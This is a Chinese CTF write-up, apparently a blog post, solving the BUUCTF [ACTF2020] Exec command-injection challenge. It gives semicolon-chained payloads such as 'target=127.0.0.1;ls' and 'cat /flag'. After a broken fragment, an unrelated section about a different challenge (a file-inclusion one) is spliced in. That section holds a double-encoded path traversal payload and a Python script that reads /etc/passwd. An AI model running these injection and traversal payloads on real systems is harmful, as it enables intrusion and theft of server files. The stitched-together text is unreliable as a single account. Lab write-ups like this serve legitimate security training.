BUUCTF-Web-命令执行-[ACTF2020 新生赛]Exec

BUUCTF-Web-命令执行-[ACTF2020 新生赛]Exec

题目链接:BUUCTF
类型:命令注入
知识点:命令拼接符(||、;、&&…)

解题过程

这道题目比较简单,打开发现是一个ping命令执行页面,使用post接受参数

测试命令拼接符";"发现未进行过滤,拼接ls命令得到回显

  • target=127.0.0.1;ls

查看index.php源码发现目标未对参数进行任何过滤

  • target=127.0.0.1;cp index.php 1.txt

网页根目录未发现flag,这时可以尝试去/root目录或者根目录下找找,最后在根目录下找到flag,直接使用cat查看即可

  • cat /flag

    vYJh-1646794766588)]
### 关于 BUUCTF ACTF2020 新生 Web Include 题目分析 #### 背景介绍 该题目属于Web安全领域中的文件包含漏洞利用。通过特定的URL参数绕过服务器端的安全检查,最终读取到目标文件的内容。 #### 技术细节解析 在本题中,攻击者可以控制`file`参数来指定要加载的文件路径。由于存在两层URL编码机制,使得原本受限的字符能够成功传递给PHP解释器处理: - `%253F`经过第一次解码变为`%3F` - 经第二次解码后成为问号(`?`),这有助于规避某些基于字符串匹配方式实现的简单防护措施[^1] 因此,当访问如下链接时: ``` http://url.to.target/?file=hint.php%253F/../../../../ffffllllaaaagggg ``` 实际上是在尝试从根目录向上回溯多个层级并请求名为`ffffllllaaaagggg`的目标文件。这种技巧常用于测试是否存在本地文件包含(Local File Inclusion, LFI)漏洞以及评估其严重程度。 #### 实际操作建议 为了验证上述理论,在实验环境中应当谨慎构建类似的payload,并确保只针对授权范围内的资源进行探索。同时注意观察返回的数据流特征变化情况,比如页面布局结构调整或是新增加了异常提示信息等现象。 ```python import requests target_url = "http://example.com/index.php" payload = "?file=hint.php%253F/../../../../etc/passwd" response = requests.get(target_url + payload) if b'root:x:' in response.content: print("[+] Potential Local File Inclusion vulnerability detected.") else: print("[-] No obvious signs of a vulnerable condition found.") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值